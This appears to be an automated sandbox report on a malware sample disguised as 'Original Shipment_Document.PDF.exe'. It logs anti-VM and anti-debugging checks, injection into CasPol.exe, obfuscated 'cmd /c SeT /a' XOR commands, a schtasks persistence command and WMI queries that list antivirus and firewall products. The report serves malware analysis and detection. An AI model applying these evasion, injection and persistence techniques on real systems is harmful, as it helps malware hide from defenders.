Source: Original Shipment_Document.PDF.exe, 00000001.00000002.185975967434.0000000004F19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: Original Shipment_Document.PDF.exe, 00000001.00000002.185975967434.0000000004F19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: CasPol.exe, 00000088.00000003.186210437136.00000000011CD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`
Source: Original Shipment_Document.PDF.exe, 00000001.00000002.185975967434.0000000004F19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: Original Shipment_Document.PDF.exe, 00000001.00000002.185975454741.0000000003381000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ntdlluser32kernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoKERNELBASE.DLLshell32advapi32TEMP=windir=\Microsoft.NET\Framework\v2.0.50727\caspol.exewindir=\syswow64\iertutil.dll
Source: Original Shipment_Document.PDF.exe, 00000001.00000002.185975967434.0000000004F19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicheartbeat
Source: CasPol.exe, 00000088.00000003.186208501547.00000000011FD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW=2_

Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe

Code function: 1_2_718D1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe

Code function: 1_2_03281329 rdtsc

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe

Process token adjusted: Debug

Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03289F60 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03291B4A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03289F53 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_0328D205 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_0328FD64 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_0328A172 mov ebx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_032909E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_0328A020 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_032898BD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_032898C0 mov eax, dword ptr fs:[00000030h]

Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe

Code function: 1_2_0328FD77 LdrLoadDll,

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Writes to foreign memory regions

Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe base: E30000

Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x721C070B^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x7C156677^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x03631637^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x5C382120^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x7F303920^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x78713865^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x4B6D7569^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x19307575^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x41616575^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09696575^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x0975752C^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x19697965^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x49796569^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x19307571^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x15793C65^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09216D75^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09703C6B^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x4B6C7578^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x7C156677^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x0363032C^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x4B2D2024^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x55183929^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x563A7D2C^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09753C65^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09216475^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09696575^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x15793C65^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09216675^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09697965^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x5079653D^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x0D697C35^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x172B6478^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x721C070B^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x7C156677^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x03630620^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x4D1F3C29^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x5C093A2C^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x572D3037^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x11307537^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x0C75752C^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x19686375^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09697569^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x19307575^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x15307575^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x10307B37^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x0A64721C^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x721C070B^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x7C156677^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x03630720^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x583D132C^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x553C7D2C^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x4B6C7965^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x4D1F3C29^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x5C093A2C^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09216475^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x15307575^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: unknown unknown
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: unknown unknown
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x0975752C^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x41616575^962155845"
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DSL Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp6DD1.tmp

Source: CasPol.exe, 00000088.00000003.186100296322.000000001FA62000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000088.00000003.186128387512.000000001FA62000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000088.00000003.186172734108.000000001FA62000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: Program Manager

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe

Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
